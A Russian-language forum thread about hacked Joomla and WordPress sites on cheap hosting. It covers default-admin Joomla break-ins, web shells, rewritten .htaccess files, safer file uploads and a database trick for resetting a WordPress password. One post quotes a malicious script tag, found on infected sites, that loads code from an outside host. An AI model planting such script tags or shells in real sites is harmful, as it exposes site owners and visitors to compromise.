Вот это и есть виновник. Вот описание уязвимости. Имеют все джумлы до 1.5.26 с дефолтным admin и открытой админкой.
Проникают в админку, заливают шелл. Если на аккаунте сайтов несколько - имеют их все.
Так что если .htaccess-ы меняются - не нужно лететь их чистить, они завтра снова такими станут. Сначала надо найти шелл, через который их меняют, а потом уже файлы чистить.
Очень редко я встречал когда htaccess по фтп перезаписывали, хотя бывало и такое.
Ну вот, значит у вас через эту форму можно загружать абсолютно любые типы файлов, этим и пользуются. Нужно сделать возможность загрузки только файлов с определёнными расширениями и ещё очень хорошая вещь - это переименование файла при загрузке. То есть загружают например file.zip а на сервере он должен появиться как jjchgkjhhj.zip например.
Скорее всего всё верно, антивирусы на шеллы ругаются, обычно их бэкдорами обзывают или чем-то похожим.
Вы лучше думайте как вам его загрузили, может на сайте есть какие-то формы обратной связи например, с возможностью прикреплять файлы, или что-то в этом роде?
Как вариант, qpik.biz можете глянуть. За 80 рублей у них гиг места, по количеству сайтов ограничений нет
Здравствуйте. Пишите в личку, или в аську (в профиле), помогу.
Или можете сами: обновляете Joomla, закрываете админку, ищите шеллы (а то, что они есть - я уверен процентов на 90), ну и конечно удаляете то, что вам дописали в файлы.
Всё просто в принципе. :)
Ничего вы не понимаете. 🤪
Сегодня с двадцать пятого раза (здесь всё продумано, школьники не пройдут) мне таки удалось зарегистрироваться и получить аккаунт на этом блистательном хостинге.
Поэтому спешу с форумчанами поделиться своими впечатлениями от увиденных современных высоких технологий.
Целых две хостинг компании 45mb.ru и index-host.ru вместе со всеми своими нынешними и будущими клиентами располагаются на VPS сервере с установленной по дефолту из шаблона панелькой ISP Lite и целыми 10 ГБ места на диске.
Настраивать сервер конечно никто не пытался, поэтому весь софт там также дефолтный с дефолтными настройками, но зачем же заниматься всякими глупостями, когда компания обладает по всей видимости настолько современными, можно сказать космическими технологиями, чтобы на диске в 10 ГБ предлагать тарифные планы с неограниченным местом.
По всей видимости сей чудеснейший vps сервер имеет прямую связь с космосом и поэтому место у них никогда не заканчивается, все файлы клиентов располагаются в облачном пространстве (в том, которое над нами, которое дождём иногда поливает), существует подозрение, что и резервные копии делаются туда же.
В общем учитесь хостеры, уверен, никто из вас так не может. 😂😂😂
AleksHost, так это вы что, людей вздумали обманывать?
Пишите "Только качественные услуги хостинга", а у вас на сервере посторонние люди творят что хотят.
Может для начала стоит нанять хорошего админа, который по человечески настроит ваш сервер и уязвимости закроет, а потом уже можно будет и рассказывать здесь, как у вас прекрасно. :)
pq777pq, вот темку почитайте. Уверен, что у вас тоже самое.
Сомневаюсь я, что дело в хостерах. Я например видел
<script src="http://statistic.dyndns.org/rss.js"></script>
2 раза. Один раз на Dle, но там на сайте были залиты 3 шелла, и один раз вообще на Юкозе
6666, на будущее: регистрируете на любом другом вордпрессе любого юзера. Пароль вы получается знаете. Потом из той базы берёте соль, соответствующую этому известному паролю и вставляете её в ту базу, тому юзеру, пароль которого нужно восстановить.
Всё.
